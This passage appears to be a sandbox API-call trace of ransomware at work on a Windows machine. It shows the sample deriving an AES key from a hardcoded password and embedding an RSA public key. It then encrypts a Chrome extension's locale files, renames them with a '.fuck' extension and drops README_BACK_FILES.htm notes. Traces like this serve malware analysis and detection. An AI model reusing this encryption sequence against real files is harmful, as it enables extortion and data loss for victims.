"c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.gsg")) returned 1 [0259.468] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json.fuck")) returned 1 [0259.470] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.470] CryptDestroyKey (hKey=0x2e7c7c0) returned 1 [0259.470] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.470] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.470] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.470] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\readme_back_files.htm")) returned 0xffffffff [0259.470] AreFileApisANSI () returned 1 [0259.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.471] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.471] GetFileType (hFile=0x5d64) returned 0x1 [0259.472] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.473] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.473] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.473] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.473] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.473] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.473] GetLastError () returned 0x0 [0259.473] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json")) returned 0x20 [0259.473] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json", dwFileAttributes=0x80) returned 1 [0259.474] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.475] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.475] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.476] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.478] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.478] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.478] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.478] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c7c0) returned 1 [0259.478] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.478] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.478] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6d988) returned 1 [0259.479] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6d988, dwCertEncodingType=0x1, pInfo=0x2e27ce0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e27d10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e27d18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cc40) returned 1 [0259.479] CryptEncrypt (in: hKey=0x2e7cc40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.479] CryptEncrypt (in: hKey=0x2e7cc40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6da98*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6da98*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.479] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6da98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6da98*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.480] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x2ae, lpOverlapped=0x0) returned 1 [0259.482] CryptEncrypt (in: hKey=0x2e7c7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2ae, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2b0) returned 1 [0259.482] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2b0, lpOverlapped=0x0) returned 1 [0259.483] CloseHandle (hObject=0x5d5c) returned 1 [0259.484] CloseHandle (hObject=0x5d60) returned 1 [0259.484] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json"), bFailIfExists=0) returned 1 [0259.487] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json", dwFileAttributes=0x0) returned 1 [0259.487] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.gsg")) returned 1 [0259.488] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\messages.json.fuck")) returned 1 [0259.490] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.490] CryptDestroyKey (hKey=0x2e7c7c0) returned 1 [0259.490] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.490] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.490] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.490] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\readme_back_files.htm")) returned 0xffffffff [0259.490] AreFileApisANSI () returned 1 [0259.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.490] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.491] GetFileType (hFile=0x5d64) returned 0x1 [0259.491] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.492] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.492] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.493] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.493] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.493] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.493] GetLastError () returned 0x0 [0259.493] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json")) returned 0x20 [0259.494] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json", dwFileAttributes=0x80) returned 1 [0259.495] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.495] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.497] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.497] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.499] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.499] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.499] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.499] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c440) returned 1 [0259.499] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.499] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.500] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6d438) returned 1 [0259.500] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6d438, dwCertEncodingType=0x1, pInfo=0x2e28290*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e282c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e282c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7cb80) returned 1 [0259.500] CryptEncrypt (in: hKey=0x2e7cb80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.500] CryptEncrypt (in: hKey=0x2e7cb80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6d7f0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6d7f0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.500] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6d7f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6d7f0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.501] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x2bb, lpOverlapped=0x0) returned 1 [0259.507] CryptEncrypt (in: hKey=0x2e7c440, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2bb, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2c0) returned 1 [0259.507] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2c0, lpOverlapped=0x0) returned 1 [0259.514] CloseHandle (hObject=0x5d60) returned 1 [0259.515] CloseHandle (hObject=0x5d5c) returned 1 [0259.515] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json"), bFailIfExists=0) returned 1 [0259.518] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json", dwFileAttributes=0x0) returned 1 [0259.518] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.gsg")) returned 1 [0259.520] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\messages.json.fuck")) returned 1 [0259.521] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.521] CryptDestroyKey (hKey=0x2e7c440) returned 1 [0259.521] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.521] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.521] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.521] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\readme_back_files.htm")) returned 0xffffffff [0259.521] AreFileApisANSI () returned 1 [0259.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.521] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.522] GetFileType (hFile=0x5d64) returned 0x1 [0259.522] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.523] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.524] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.524] 